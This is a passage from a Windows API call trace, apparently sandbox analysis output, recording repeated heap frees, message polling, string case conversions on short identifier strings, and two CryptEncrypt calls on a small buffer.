cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0254.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.028] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0254.028] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0254.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0254.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.029] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0254.029] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.029] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.029] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.030] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.030] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0254.030] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0254.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0254.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.031] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.031] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.031] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.031] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.031] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0254.032] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.032] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.032] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.032] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0254.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.032] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0254.033] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0254.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0254.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a6e38 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0254.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0254.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0254.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.037] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x16f0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x16f8) returned 1 [0254.037] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.038] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.038] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.038] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.039] CharLowerBuffW (in: lpsz="byte[5880]", cchLength=0xa | out: lpsz="byte[5880]") returned 0xa [0254.039] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.039] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.039] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.039] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.039] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.039] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.039] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.039] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.039] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a6e38*, pdwDataLen=0x8bef68*=0x16f0, dwBufLen=0x16f8 | out: pbData=0x34a6e38*, pdwDataLen=0x8bef68*=0x16f8) returned 1 [0254.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.040] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.040] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.040] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.040] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.040] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.040] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.040] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.040] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.041] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.041] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.041] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.041] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.041] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.041] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.041] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.041] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.041] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.041] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.041] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.041] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.042] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.042] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.042] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.043] 